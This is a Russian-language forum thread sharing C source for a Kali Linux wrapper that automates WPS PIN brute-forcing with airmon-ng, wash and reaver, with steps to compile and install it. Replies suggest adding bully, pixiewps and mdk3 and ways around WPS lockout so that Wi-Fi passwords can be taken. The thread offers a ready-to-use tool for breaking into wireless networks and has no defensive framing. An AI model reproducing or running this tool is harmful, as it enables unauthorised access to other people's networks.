Представляю на ваш суд небольшое, написанное на скорую руку дополнение к Kali linux. По сути оно всего лишь упрощает процедуру брута WPS и было написано для тех, кому сложно (лень) разобраться в этом. Вот исходник Code: #include <stdio.h> #include <stdlib.h> #include <string.h> int choose; int n; int x = -2; char mac [17]; char massiv [22]; char massiv2 [22] = "airmon-ng start mon0 "; char stroka [100]; FILE *out; FILE *out2; FILE *out3; FILE *out4; int main() { out = fopen ("iwconfig.txt", "w"); fprintf (out, "%s", "airmon-ng start "); fclose (out); out = fopen ("iwconfig.txt", "a"); system ("iwconfig » iwconfig.txt"); fclose (out); system ("clear"); out = fopen ("iwconfig.txt", "r"); fgets (massiv, 22, out); fclose (out); out2 = fopen ("out2.sh", "w"); fprintf (out2, "%s\n", massiv); fclose (out2); if (strcmp (massiv, massiv2) == 0) { goto wash; } else { system ("sh out2.sh"); system ("clear"); wash: printf ("%s", "\tScanning WPS-enable networks. Press ctrl + c to stop.\n"); sleep (1); system ("wash -i mon0 | tee wash.txt"); reaver (); if (n == 0) { goto rem; }else{ goto brut; } brut: system ("sh out3.sh"); rem: printf ("%s", "\t\t***Target is not choosed***\n"); sleep (2); system ("clear"); printf ("%s\n", "Removing temporary files."); remove ("iwconfig.txt"); sleep (1); system ("clear"); printf ("%s\n", "Removing temporary files.."); remove ("wash.txt"); sleep (1); system ("clear"); printf ("%s\n", "Removing temporary files..."); remove ("out2.sh"); sleep (1); system ("clear"); printf ("%s\n", "Removing temporary files...."); remove ("out3.sh"); system ("clear"); printf ("%s\n", "Removing mon0"); sleep (1); system ("airmon-ng stop mon0"); putchar ('\a'); system ("clear"); printf ("%s\n", "Good bye =)"); return 0; } } int reaver() { printf ("%s", "Choose network nmber (Or choose 0 (ZERO) to stop.)\n"); scanf ("%d", &n); out4 = fopen ("wash.txt", "r"); for (x; x <= n; x++) { fgets (stroka, 100, out4); } char * mac = strtok (stroka, " "); fclose (out4); out3 = fopen ("out3.sh", "w"); fprintf (out3, "%s %s %s", "reaver -i mon0 -b", mac, "-v -S"); fclose (out3); return 0; } P.S. если кто не в курсе как воспользоваться сим чудом: 1. создаете текстовый файл, туда копируете исходный код, называете файл, например, main.c 2. запускаете терминал 3. в терминале пишите cd /директория_где_лежит_ваш_файл_main.c 4. gcc -o abrakadabra main.c 5. копируете бинарник abrakadabra в /usr/bin 6. просто набираете в терминале abrakadabra Пожелания, предложения, критика приветствуются.
Неплохо было бы добавить сюда за стиль буду для скорости писать в псевдокоде case { ривер не работает // ривер наверное лучше было бы заменить кляксой а также добавить в код pixiedust, pixiewps, ethercap и т.д. case гоняет онин и тот же пин тогда {запуск bully {bully работает как надо находит пин bully не работает запуск {запуск mdk3 {bully заработало case{ пин получен; bully сканирует один и тот же пин ; } //переход к другим видам атак начиная от простейших и заканчивая самыми сложнымискрипты и т.д..... }}}} // Неплохо бы было так пройтись по всему Kali linux для получения пароля // В ривер также добавить пустой пин и т.д.
та.....а если wps локе?)))сейчас просто пркатически все точки в лок уходят,сейчас нужно что то эдакое,что обходит лок wps.т.е перебирает пины с залоченым wps,вот это супер скрипт бы был,цены не было бы))
Wps lock надо тоже учесть поэтому сначала использовать те виды атак которые не дают wps lock, а потом все остальные кстати - может я не прав, в в андройд если перебирать wps - wps lock или ограничение числа попыток перебора отсутствует.
